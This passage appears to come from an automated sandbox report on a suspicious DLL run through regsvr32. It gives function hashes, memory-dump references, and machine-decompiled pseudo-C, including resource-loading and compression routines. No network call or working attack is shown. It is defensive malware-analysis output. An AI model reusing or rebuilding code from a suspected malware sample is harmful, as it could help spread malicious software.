        • Opcode Fuzzy Hash: e28efd3bc395d1b39df08d097cd77ac4fd9f2a4dd6740d30e2db242414d57b87
        • Instruction Fuzzy Hash: BDE0DF7A8003186FD750EF788D46F9ABBFDEB80A00F018554AC85B3308E670EF048790
        Uniqueness

        Uniqueness Score: -1.00%

        Function 1000A51A, Relevance: 1.6, APIs: 1, Instructions: 64COMMON
        Download Yara Rule
        C-Code - Quality: 100%
        			E1000A51A(struct HINSTANCE__* __ecx, CHAR* __edx, void* __fp0, intOrPtr* _a4) {
				CHAR* _v8;
				struct HRSRC__* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _t15;
				signed int _t17;
				struct HRSRC__* _t20;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr* _t23;
				intOrPtr* _t26;
				struct HINSTANCE__* _t28;
				intOrPtr _t30;
				intOrPtr* _t33;
				signed int _t35;
				intOrPtr _t37;
				void* _t38;
				void* _t39;
				void* _t43;

				_t43 = __fp0;
				_t29 = __ecx;
				_v8 = __edx;
				_t28 = __ecx;
				_v20 = 0xa;
				_t35 = 0;
				_v16 = 3;
				while(1) {
					_t15 =  *0x1001e688; // 0x2120590
					_t17 = E1001242D(_t29, 0, _t43, _t15 + 0x648, 0x1e, 0x32);
					_t29 =  *0x1001e688; // 0x2120590
					_t39 = _t39 + 0xc;
					_t20 = FindResourceA(_t28, _v8, _t17 *  *(_t29 + 0x644) +  *((intOrPtr*)(_t38 + _t35 * 4 - 0x10)));
					_v12 = _t20;
					if(_t20 != 0) {
						break;
					}
					_t35 = _t35 + 1;
					if(_t35 < 2) {
						continue;
					}
					L5:
					return 0;
				}
				_t21 =  *0x1001e684; // 0x219faa0
				_t22 =  *((intOrPtr*)(_t21 + 0x98))(_t28, _t20);
				_t30 =  *0x1001e684; // 0x219faa0
				_t37 = _t22;
				_t23 =  *((intOrPtr*)(_t30 + 0x9c))(_t28, _v12);
				__eflags = _t23;
				if(_t23 != 0) {
					_t33 = E10008669(_t23, _t37);
					__eflags = _t33;
					if(_t33 == 0) {
						goto L5;
					}
					_t26 = _a4;
					__eflags = _t26;
					if(_t26 != 0) {
						 *_t26 = _t37;
					}
					return _t33;
				}
				goto L5;
			}






















        0x1000a51a
        0x1000a51a
        0x1000a523
        0x1000a526
        0x1000a528
        0x1000a52f
        0x1000a531
        0x1000a538
        0x1000a538
        0x1000a54d
        0x1000a552
        0x1000a558
        0x1000a56b
        0x1000a571
        0x1000a576
        0x00000000
        0x00000000
        0x1000a578
        0x1000a57c
        0x00000000
        0x00000000
        0x1000a5a3
        0x00000000
        0x1000a5a3
        0x1000a581
        0x1000a587
        0x1000a590
        0x1000a596
        0x1000a599
        0x1000a59f
        0x1000a5a1
        0x1000a5b0
        0x1000a5b2
        0x1000a5b4
        0x00000000
        0x00000000
        0x1000a5b6
        0x1000a5b9
        0x1000a5bb
        0x1000a5bd
        0x1000a5bd
        0x00000000
        0x1000a5bf
        0x00000000

        APIs
          • Part of subcall function 1001242D: _ftol2_sse.MSVCRT ref: 1001248E
        • FindResourceA.KERNEL32(?,?,0000000A), ref: 1000A56B
        Memory Dump Source
        • Source File: 00000004.00000002.516519974.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
        • Associated: 00000004.00000002.516504464.0000000010000000.00000002.00020000.sdmp Download File
        • Associated: 00000004.00000002.516635560.0000000010018000.00000002.00020000.sdmp Download File
        • Associated: 00000004.00000002.516644135.000000001001D000.00000004.00020000.sdmp Download File
        • Associated: 00000004.00000002.516650273.000000001001F000.00000002.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd
        Similarity
        • API ID: FindResource_ftol2_sse
        • String ID:
        • API String ID: 726351646-0
        • Opcode ID: fa11afd7f41ea2378334fb299b75509f8c3df56b18904dd99f39985f38db9f94
        • Instruction ID: 3c93fbf5725d9a1cffb7147d36ac05838d176544f789f1d2bd1208ee8d1f8f1b
        • Opcode Fuzzy Hash: fa11afd7f41ea2378334fb299b75509f8c3df56b18904dd99f39985f38db9f94
        • Instruction Fuzzy Hash: 3D119D71B00305AFFB04CB69EC85E5E7BE9FB55395F014168F909D7252EA71DD408B50
        Uniqueness

        Uniqueness Score: -1.00%

        Function 10016EB0, Relevance: .4, Instructions: 359COMMONCrypto
        Download Yara Rule
        C-Code - Quality: 99%
        			E10016EB0(intOrPtr _a4, signed int _a8, signed int _a12) {
				signed int _v8;
				signed short* _v12;
				char _v16;
				signed short _v20;
				unsigned int _v24;
				signed short _v28;
				signed int _t223;
				signed int _t235;
				signed int _t237;
				signed short _t240;
				signed int _t241;
				signed short _t244;
				signed int _t245;
				signed short _t248;
				signed int _t249;
				signed int _t250;
				void* _t254;
				signed char _t259;
				signed int _t275;
				signed int _t289;
				signed int _t308;
				signed short _t316;
				signed int _t321;
				void* _t329;
				signed short _t330;
				signed short _t333;
				signed short _t334;
				signed short _t343;
				signed short _t346;
				signed short _t347;
				signed short _t348;
				signed short _t358;
				signed short _t361;
				signed short _t362;
				signed short _t363;
				signed short _t370;
				signed int _t373;
				signed int _t378;
				signed short _t379;
				signed short _t382;
				unsigned int _t388;
				unsigned short _t390;
				unsigned short _t392;
				unsigned short _t394;
				signed int _t396;
				signed int _t397;
				signed int _t398;
				signed int _t400;
				signed short _t401;
				signed int _t402;
				signed int _t403;
				signed int _t407;
				signed int _t409;

				_t223 = _a8;
				_t235 =  *(_t223 + 2) & 0x0000ffff;
				_push(_t397);
				_t388 = 0;
				_t398 = _t397 | 0xffffffff;
				if(_a12 < 0) {
					L42:
					return _t223;
				} else {
					_t329 =  !=  ? 7 : 0x8a;
					_v12 = _t223 + 6;
					_t254 = (0 | _t235 != 0x00000000) + 3;
					_v16 = _a12 + 1;
					do {
						_v24 = _t388;
						_t388 = _t388 + 1;
						_a8 = _t235;
						_a12 = _t235;
						_v8 =  *_v12 & 0x0000ffff;
						_t223 = _a4;
						if(_t388 >= _t329) {
							L4:
							if(_t388 >= _t254) {
								if(_a8 == 0) {
									_t122 = _t223 + 0x16bc; // 0x8b3c7e89
									_t400 =  *_t122;
									if(_t388 > 0xa) {
										_t168 = _t223 + 0xac4; // 0x5dc03300
										_t330 =  *_t168 & 0x0000ffff;
										_t169 = _t223 + 0xac6; // 0x55c35dc0
										_t237 =  *_t169 & 0x0000ffff;
										_v24 = _t330;
										_t171 = _t223 + 0x16b8; // 0xfffffe8b
										_t333 = (_t330 << _t400 |  *_t171) & 0x0000ffff;
										_v28 = _t333;
										if(_t400 <= 0x10 - _t237) {
											_t259 = _t400 + _t237;
										} else {
											_t173 = _t223 + 0x14; // 0xc703f045
											 *(_t223 + 0x16b8) = _t333;
											_t175 = _t223 + 8; // 0x8d000040
											 *((char*)( *_t175 +  *_t173)) = _v28;
											_t223 = _a4;
											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
											_t181 = _t223 + 0x14; // 0xc703f045
											_t182 = _t223 + 8; // 0x8d000040
											_t183 = _t223 + 0x16b9; // 0x89fffffe
											 *((char*)( *_t181 +  *_t182)) =  *_t183;
											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
											_t333 = _v24 >> 0x10;
											_t189 = _t223 + 0x16bc; // 0x8b3c7e89
											_t259 =  *_t189 + 0xfffffff0 + _t237;
										}
										_t334 = _t333 & 0x0000ffff;
										 *(_t223 + 0x16bc) = _t259;
										 *(_t223 + 0x16b8) = _t334;
										_t401 = _t334 & 0x0000ffff;
										if(_t259 <= 9) {
											_t209 = _t388 - 0xb; // -10
											 *(_t223 + 0x16b8) = _t209 << _t259 | _t401;
											 *(_t223 + 0x16bc) = _t259 + 7;
										} else {
											_t193 = _t223 + 8; // 0x8d000040
											_t390 = _t388 + 0xfffffff5;
											_t194 = _t223 + 0x14; // 0xc703f045
											_t240 = _t390 << _t259 | _t401;
											 *(_t223 + 0x16b8) = _t240;
											 *( *_t193 +  *_t194) = _t240;
											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
											_t199 = _t223 + 0x14; // 0xc703f045
											_t200 = _t223 + 8; // 0x8d000040
											_t201 = _t223 + 0x16b9; // 0x89fffffe
											 *((char*)( *_t199 +  *_t200)) =  *_t201;
											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
											 *(_t223 + 0x16bc) =  *(_t223 + 0x16bc) + 0xfffffff7;
											 *(_t223 + 0x16b8) = _t390 >> 0x10;
										}
										goto L35;
									}
									_t123 = _t223 + 0xac0; // 0x4e9
									_t343 =  *_t123 & 0x0000ffff;
									_t124 = _t223 + 0xac2; // 0x33000000
									_t241 =  *_t124 & 0x0000ffff;
									_v24 = _t343;
									_t126 = _t223 + 0x16b8; // 0xfffffe8b
									_t346 = (_t343 << _t400 |  *_t126) & 0x0000ffff;
									_v28 = _t346;
									if(_t400 > 0x10 - _t241) {
										_t128 = _t223 + 0x14; // 0xc703f045
										 *(_t223 + 0x16b8) = _t346;
										_t130 = _t223 + 8; // 0x8d000040
										 *((char*)( *_t130 +  *_t128)) = _v28;
										_t223 = _a4;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t136 = _t223 + 0x14; // 0xc703f045
										_t137 = _t223 + 8; // 0x8d000040
										_t138 = _t223 + 0x16b9; // 0x89fffffe
										 *((char*)( *_t136 +  *_t137)) =  *_t138;
										_t142 = _t223 + 0x16bc; // 0x8b3c7e89
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t346 = _v24 >> 0x10;
										_t400 =  *_t142 + 0xfffffff0;
									}
									_t403 = _t400 + _t241;
									_t347 = _t346 & 0x0000ffff;
									 *(_t223 + 0x16bc) = _t403;
									 *(_t223 + 0x16b8) = _t347;
									_t348 = _t347 & 0x0000ffff;
									if(_t403 <= 0xd) {
										_t163 = _t403 + 3; // 0x8b3c7e8c
										_t275 = _t163;
										L28:
										 *(_t223 + 0x16bc) = _t275;
										_t165 = _t388 - 3; // -2
										_t166 = _t223 + 0x16b8; // 0xfffffe8b
										 *(_t223 + 0x16b8) = (_t165 << _t403 |  *_t166 & 0x0000ffff) & 0x0000ffff;
									} else {
										_t392 = _t388 + 0xfffffffd;
										_t147 = _t223 + 0x14; // 0xc703f045
										_t244 = _t392 << _t403 | _t348;
										_t148 = _t223 + 8; // 0x8d000040
										 *(_t223 + 0x16b8) = _t244;
										 *( *_t148 +  *_t147) = _t244;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t153 = _t223 + 0x14; // 0xc703f045
										_t154 = _t223 + 8; // 0x8d000040
										_t155 = _t223 + 0x16b9; // 0x89fffffe
										 *((char*)( *_t153 +  *_t154)) =  *_t155;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										 *(_t223 + 0x16bc) =  *(_t223 + 0x16bc) + 0xfffffff3;
										 *(_t223 + 0x16b8) = _t392 >> 0x00000010 & 0x0000ffff;
									}
									goto L35;
								}
								_t289 = _a12;
								if(_t289 != _t398) {
									_t53 = _t289 * 4; // 0x238830a
									_t396 =  *(_t223 + _t53 + 0xa7e) & 0x0000ffff;
									_t56 = _t235 * 4; // 0x830a74c0
									_t370 =  *(_t223 + _t56 + 0xa7c) & 0x0000ffff;
									_t58 = _t223 + 0x16bc; // 0x8b3c7e89
									_t407 =  *_t58;
									_v28 = _t370;
									_t60 = _t223 + 0x16b8; // 0xfffffe8b
									_t249 = (_t370 << _t407 |  *_t60) & 0x0000ffff;
									if(_t407 <= 0x10 - _t396) {
										_t373 = _t249;
										_t308 = _t407 + _t396;
									} else {
										_t61 = _t223 + 0x14; // 0xc703f045
										_t62 = _t223 + 8; // 0x8d000040
										 *(_t223 + 0x16b8) = _t249;
										 *( *_t62 +  *_t61) = _t249;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t67 = _t223 + 0x14; // 0xc703f045
										_t68 = _t223 + 8; // 0x8d000040
										_t69 = _t223 + 0x16b9; // 0x89fffffe
										 *((char*)( *_t67 +  *_t68)) =  *_t69;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t75 = _t223 + 0x16bc; // 0x8b3c7e89
										_t373 = _v28 >> 0x00000010 & 0x0000ffff;
										_t308 =  *_t75 + 0xfffffff0 + _t396;
									}
									_t388 = _v24;
									 *(_t223 + 0x16bc) = _t308;
									 *(_t223 + 0x16b8) = _t373;
								}
								_t80 = _t223 + 0xabc; // 0x5d0674c0
								_t358 =  *_t80 & 0x0000ffff;
								_t81 = _t223 + 0x16bc; // 0x8b3c7e89
								_t402 =  *_t81;
								_t82 = _t223 + 0xabe; // 0x4e95d06
								_t245 =  *_t82 & 0x0000ffff;
								_v24 = _t358;
								_t84 = _t223 + 0x16b8; // 0xfffffe8b
								_t361 = (_t358 << _t402 |  *_t84) & 0x0000ffff;
								_v28 = _t361;
								if(_t402 > 0x10 - _t245) {
									_t86 = _t223 + 0x14; // 0xc703f045
									 *(_t223 + 0x16b8) = _t361;
									_t88 = _t223 + 8; // 0x8d000040
									 *((char*)( *_t88 +  *_t86)) = _v28;
									_t223 = _a4;
									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
									_t94 = _t223 + 0x14; // 0xc703f045
									_t95 = _t223 + 8; // 0x8d000040
									_t96 = _t223 + 0x16b9; // 0x89fffffe
									 *((char*)( *_t94 +  *_t95)) =  *_t96;
									_t100 = _t223 + 0x16bc; // 0x8b3c7e89
									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
									_t361 = _v24 >> 0x10;
									_t402 =  *_t100 + 0xfffffff0;
								}
								_t403 = _t402 + _t245;
								_t362 = _t361 & 0x0000ffff;
								 *(_t223 + 0x16bc) = _t403;
								 *(_t223 + 0x16b8) = _t362;
								_t363 = _t362 & 0x0000ffff;
								if(_t403 <= 0xe) {
									_t121 = _t403 + 2; // 0x8b3c7e8b
									_t275 = _t121;
									goto L28;
								} else {
									_t394 = _t388 + 0xfffffffd;
									_t105 = _t223 + 0x14; // 0xc703f045
									_t248 = _t394 << _t403 | _t363;
									_t106 = _t223 + 8; // 0x8d000040
									 *(_t223 + 0x16b8) = _t248;
									 *( *_t106 +  *_t105) = _t248;
									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
									_t111 = _t223 + 0x14; // 0xc703f045
									_t112 = _t223 + 8; // 0x8d000040
									_t113 = _t223 + 0x16b9; // 0x89fffffe
									 *((char*)( *_t111 +  *_t112)) =  *_t113;
									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
									 *(_t223 + 0x16bc) =  *(_t223 + 0x16bc) + 0xfffffff2;
									 *(_t223 + 0x16b8) = _t394 >> 0x00000010 & 0x0000ffff;
									goto L35;
								}
							} else {
								_t316 = _t223 + (_t235 + 0x29f) * 4;
								_v28 = _t316;
								do {
									_t378 = _a12;
									_t22 = _t223 + 0x16bc; // 0x8b3c7e89
									_t409 =  *_t22;
									_t24 = _t378 * 4; // 0x238830a
									_t250 =  *(_t223 + _t24 + 0xa7e) & 0x0000ffff;
									_t379 =  *_t316 & 0x0000ffff;
									_v24 = _t379;
									_t27 = _t223 + 0x16b8; // 0xfffffe8b
									_t382 = (_t379 << _t409 |  *_t27) & 0x0000ffff;
									_v20 = _t382;
									if(_t409 <= 0x10 - _t250) {
										_t321 = _t409 + _t250;
									} else {
										_t29 = _t223 + 0x14; // 0xc703f045
										 *(_t223 + 0x16b8) = _t382;
										_t31 = _t223 + 8; // 0x8d000040
										 *((char*)( *_t31 +  *_t29)) = _v20;
										_t223 = _a4;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t37 = _t223 + 0x14; // 0xc703f045
										_t38 = _t223 + 8; // 0x8d000040
										_t39 = _t223 + 0x16b9; // 0x89fffffe
										 *((char*)( *_t37 +  *_t38)) =  *_t39;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t382 = _v24 >> 0x10;
										_t45 = _t223 + 0x16bc; // 0x8b3c7e89
										_t321 =  *_t45 + 0xfffffff0 + _t250;
									}
									 *(_t223 + 0x16bc) = _t321;
									_t316 = _v28;
									 *(_t223 + 0x16b8) = _t382 & 0x0000ffff;
									_t388 = _t388 - 1;
								} while (_t388 != 0);
								L35:
								_t235 = _v8;
								_t388 = 0;
								_t398 = _a12;
								if(_t235 != 0) {
									if(_a8 != _t235) {
										_t329 = 7;
										_t217 = _t329 - 3; // 0x4
										_t254 = _t217;
									} else {
										_t329 = 6;
										_t216 = _t329 - 3; // 0x3
										_t254 = _t216;
									}
								} else {
									_t329 = 0x8a;
									_t214 = _t388 + 3; // 0x3
									_t254 = _t214;
								}
								goto L41;
							}
						}
						_t223 = _a4;
						if(_t235 == _v8) {
							_t235 = _v8;
							goto L41;
						}
						goto L4;
						L41:
						_v12 =  &(_v12[2]);
						_t221 =  &_v16;
						 *_t221 = _v16 - 1;
					} while ( *_t221 != 0);
					goto L42;
				}
			}
























































        0x10016eb3
        0x10016eba
        0x10016ebe
        0x10016ec0
        0x10016ec2
        0x10016ec8
        0x100173b5
        0x100173bb
        0x10016ece
        0x10016eda
        0x10016ee7
        0x10016eea
        0x10016ef1
        0x10016ef4
        0x10016ef7
        0x10016efa
        0x10016efb
        0x10016efe
        0x10016f04
        0x10016f07
        0x10016f0c
        0x10016f1c
        0x10016f1e
        0x10016fd4
        0x10017163
        0x10017163
        0x1001716c
        0x1001727f
        0x1001727f
        0x10017286
        0x10017286
        0x1001728f
        0x1001729c
        0x100172a5
        0x100172a8
        0x100172ad
        0x100172f5
        0x100172af
        0x100172af
        0x100172b2
        0x100172b9
        0x100172bf
        0x100172c2
        0x100172c5
        0x100172c8
        0x100172cb
        0x100172ce
        0x100172d4
        0x100172e2
        0x100172e5
        0x100172e8
        0x100172f1
        0x100172f1
        0x100172f8
        0x100172fb
        0x10017301
        0x10017308
        0x1001730e
        0x1001735c
        0x10017368
        0x1001736f
        0x10017310
        0x10017310
        0x10017313
        0x1001731c
        0x1001731f
        0x10017322
        0x10017329
        0x1001732c
        0x1001732f
        0x10017332
        0x10017335
        0x1001733b
        0x10017346
        0x1001734c
        0x10017353
        0x10017353
        0x00000000
        0x1001730e
        0x10017172
        0x10017172
        0x10017179
        0x10017179
        0x10017182
        0x1001718f
        0x10017198
        0x1001719b
        0x100171a0
        0x100171a2
        0x100171a5
        0x100171ac
        0x100171b2
        0x100171b5
        0x100171b8
        0x100171bb
        0x100171be
        0x100171c1
        0x100171c7
        0x100171d5
        0x100171db
        0x100171de
        0x100171e1
        0x100171e1
        0x100171e4
        0x100171e6
        0x100171e9
        0x100171ef
        0x100171f6
        0x100171fc
        0x10017255
        0x10017255
        0x10017258
        0x10017258
        0x1001725e
        0x10017266
        0x10017273
        0x100171fe
        0x100171fe
        0x10017209
        0x1001720c
        0x1001720f
        0x10017212
        0x10017219
        0x1001721c
        0x1001721f
        0x10017222
        0x10017225
        0x1001722b
        0x10017237
        0x1001723c
        0x10017249
        0x10017249
        0x00000000
        0x100171fc
        0x10016fda
        0x10016fdf
        0x10016fe5
        0x10016fe5
        0x10016fed
        0x10016fed
        0x10016ff5
        0x10016ff5
        0x10016ffd
        0x1001700a
        0x10017013
        0x10017018
        0x1001705d
        0x1001705f
        0x1001701a
        0x1001701a
        0x1001701d
        0x10017020
        0x10017027
        0x1001702a
        0x1001702d
        0x10017030
        0x10017033
        0x10017039
        0x10017047
        0x1001704d
        0x10017056
        0x10017059
        0x10017059
        0x10017062
        0x10017065
        0x1001706b
        0x1001706b
        0x10017072
        0x10017072
        0x10017079
        0x10017079
        0x10017081
        0x10017081
        0x10017088
        0x10017095
        0x1001709e
        0x100170a1
        0x100170a6
        0x100170a8
        0x100170ab
        0x100170b2
        0x100170b8
        0x100170bb
        0x100170be
        0x100170c1
        0x100170c4
        0x100170c7
        0x100170cd
        0x100170db
        0x100170e1
        0x100170e4
        0x100170e7
        0x100170e7
        0x100170ea
        0x100170ec
        0x100170ef
        0x100170f5
        0x100170fc
        0x10017102
        0x1001715b
        0x1001715b
        0x00000000
        0x10017104
        0x10017104
        0x1001710f
        0x10017112
        0x10017115
        0x10017118
        0x1001711f
        0x10017122
        0x10017125
        0x10017128
        0x1001712b
        0x10017131
        0x1001713d
        0x10017142
        0x1001714f
        0x00000000
        0x1001714f
        0x10016f24
        0x10016f2a
        0x10016f2d
        0x10016f30
        0x10016f30
        0x10016f33
        0x10016f33
        0x10016f39
        0x10016f39
        0x10016f41
        0x10016f46
        0x10016f53
        0x10016f5c
        0x10016f5f
        0x10016f64
        0x10016fac
        0x10016f66
        0x10016f66
        0x10016f69
        0x10016f70
        0x10016f76
        0x10016f79
        0x10016f7c
        0x10016f7f
        0x10016f82
        0x10016f85
        0x10016f8b
        0x10016f99
        0x10016f9c
        0x10016f9f
        0x10016fa8
        0x10016fa8
        0x10016fb2
        0x10016fb8
        0x10016fbb
        0x10016fc2
        0x10016fc2
        0x10017375
        0x10017375
        0x10017378
        0x1001737a
        0x1001737f
        0x1001738e
        0x1001739a
        0x1001739f
        0x1001739f
        0x10017390
        0x10017390
        0x10017395
        0x10017395
        0x10017395
        0x10017381
        0x10017381
        0x10017386
        0x10017386
        0x10017386
        0x00000000
        0x1001737f
        0x10016f1e
        0x10016f13
        0x10016f16
        0x100173a4
        0x00000000
        0x100173a4
        0x00000000
        0x100173a7
        0x100173a7
        0x100173ab
        0x100173ab
        0x100173ab
        0x00000000
        0x10016ef4

        Memory Dump Source
        • Source File: 00000004.00000002.516519974.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
        • Associated: 00000004.00000002.516504464.0000000010000000.00000002.00020000.sdmp Download File
        • Associated: 00000004.00000002.516635560.0000000010018000.00000002.00020000.sdmp Download File
        • Associated: 00000004.00000002.516644135.000000001001D000.00000004.00020000.sdmp Download File
        • Associated: 00000004.00000002.516650273.000000001001F000.00000002.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 0050a3338128a3e29d0738b8ec7b1954f4e7d535beab72997c1b6becb188d890
        • Instruction ID: 0c3308942ac57208bd8606007510a2814f56dadb0132f9c471c079d8b51e24d2
        • Opcode Fuzzy Hash: 0050a3338128a3e29d0738b8ec7b1954f4e7d535beab72997c1b6becb188d890
        • Instruction Fuzzy Hash: EEF16D755092518FC709CF18C4D48FA7BF1FFA9310B1A82F9D8999B3A6D731A980CB91
        Uniqueness

        Uniqueness Score: -1.00%

        Function 10014FC0, Relevance: .2, Instructions: 190COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000004.00000002.516519974.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
        • Associated: 00000004.00000002.516504464.0000000010000000.00000002.00020000.sdmp Download File
        • Associated: 00000004.00000002.516635560.0000000010018000.00000002.00020000.sdmp Download File
        • Associated: 00000004.00000002.516644135.000000001001D000.00000004.00020000.sdmp Download File
        • Associated: 00000004.00000002.516650273.000000001001F000.00000002.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: e5067ce0d69c97c32a38e7aeb3fef6c0114ffe29ce053d50af88417ef7cc46d5
        • Instruction ID: e10ac18f6a2dc82c047ac3a6231bc634579b0427d93bb8cac9548a9b95137502
        • Opcode Fuzzy Hash: e5067ce0d69c97c32a38e7aeb3fef6c0114ffe29ce053d50af88417ef7cc46d5
        • Instruction Fuzzy Hash: 817135356201758FE704CF2ADCD05BA33A1E78E34138AC629FA46CF395C535E626CBA0
        Uniqueness

        Uniqueness Score: -1.00%

        Function 10011758, Relevance: .2, Instructions: 169COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000004.00000002.516519974.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
        • Associated: 00000004.00000002.516504464.0000000010000000.00000002.00020000.sdmp Download File
        • Associated: 00000004.00000002.516635560.0000000010018000.00000002.00020000.sdmp Download File
        • Associated: 00000004.00000002.516644135.000000001001D000.00000004.00020000.sdmp Download File
        • Associated: 00000004.00000002.516650273.000000001001F000.00000002.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 3fd2de03972cb3b7321cea2e293ceee1f2e46d12c6b89ea3bcf7c4ef0d5e13cb
        • Instruction ID: 8b2308eb0caa98c5fc40748196c6a291e313b8726404b2d010a505a218b38381
        • Opcode Fuzzy Hash: 3fd2de03972cb3b7321cea2e293ceee1f2e46d12c6b89ea3bcf7c4ef0d5e13cb
        • Instruction Fuzzy Hash: 175157B3B041B00BDF588E3D8C642757ED35AC515270EC2BAF9A9CB24AE978C7059760
        Uniqueness

        Uniqueness Score: -1.00%

        Function 10077464, Relevance: .1, Instructions: 75COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000004.00000002.516721400.0000000010077000.00000040.00020000.sdmp, Offset: 10077000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_10077000_regsvr32.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
        • Instruction ID: a747058df7fb53957c711544c71ce12918e7169a6b47a17de73b7eef07d7616c
        • Opcode Fuzzy Hash: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
        • Instruction Fuzzy Hash: E31196733401009FD754CE55DC91EA677EAFB992707258065ED48CB316D779EC41C760
        Uniqueness

        Uniqueness Score: -1.00%

        Function 10012346, Relevance: .1, Instructions: 72COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000004.00000002.516519974.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
        • Associated: 00000004.00000002.516504464.0000000010000000.00000002.00020000.sdmp Download File
        • Associated: 00000004.00000002.516635560.0000000010018000.00000002.00020000.sdmp Download File
        • Associated: 00000004.00000002.516644135.000000001001D000.00000004.00020000.sdmp Download File
        • Associated: 00000004.00000002.516650273.000000001001F000.00000002.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 8030d81dc236fa19504743191c490e51e4050de0e9408ade4ea3357c27d2e4ca
        • Instruction ID: 1f3934e2420efc180bb9c0cbc4fac13afaf5f650056083a87c6d8f741bd90931
        • Opcode Fuzzy Hash: 8030d81dc236fa19504743191c490e51e4050de0e9408ade4ea3357c27d2e4ca
        • Instruction Fuzzy Hash: 6E2192766150128BD35CDF2CD8A2A69F3A5FB48310F45427ED42BCB682CB71E492CB80
        Uniqueness

        Uniqueness Score: -1.00%

        Function 1007785D, Relevance: .1, Instructions: 55COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000004.00000002.516721400.0000000010077000.00000040.00020000.sdmp, Offset: 10077000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_10077000_regsvr32.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: d6db8e1f961792d163c78665be140d0242f94593fd5b6291162898feff87c4c3
        • Instruction ID: 784e0acdb4fcdcc5ceb578c6db7b19a6e3175e33625eb0579154fecf24664306
        • Opcode Fuzzy Hash: d6db8e1f961792d163c78665be140d0242f94593fd5b6291162898feff87c4c3
        • Instruction Fuzzy Hash: 390126333842418FD789CF28D888D6DB7E4FBC12A4B16C0BEC58A83615D938E845CA36
        Uniqueness

        Uniqueness Score: -1.00%

        Function 1000DB3C, Relevance: 24.9, APIs: 12, Strings: 2, Instructions: 388memoryCOMMON
        Download Yara Rule
        C-Code - Quality: 50%
        			E1000DB3C(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				void* _v28;
				signed int _v32;
				char _v36;
				intOrPtr _v40;
				signed int _v44;
				char _v48;
				char _v52;
				intOrPtr _v56;
				signed int _v60;
				char* _v72;
				signed short _v80;
				signed int _v84;
				char _v88;
				char _v92;
				char _v96;
				intOrPtr _v100;
				char _v104;
				char _v616;
				intOrPtr* _t159;
				char _t165;
				signed int _t166;
				signed int _t173;
				signed int _t178;
				signed int _t186;
				intOrPtr* _t187;
				signed int _t188;
				signed int _t192;
				intOrPtr* _t193;
				intOrPtr _t200;
				intOrPtr* _t205;
				signed int _t207;
				signed int _t209;
				intOrPtr* _t210;
				intOrPtr _t212;
				intOrPtr* _t213;
				signed int _t214;
				char _t217;
				signed int _t218;
				signed int _t219;
				signed int _t230;
				signed int _t235;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				intOrPtr* _t247;
				intOrPtr* _t251;
				signed int _t252;
				intOrPtr* _t253;
				void* _t255;
				intOrPtr* _t261;
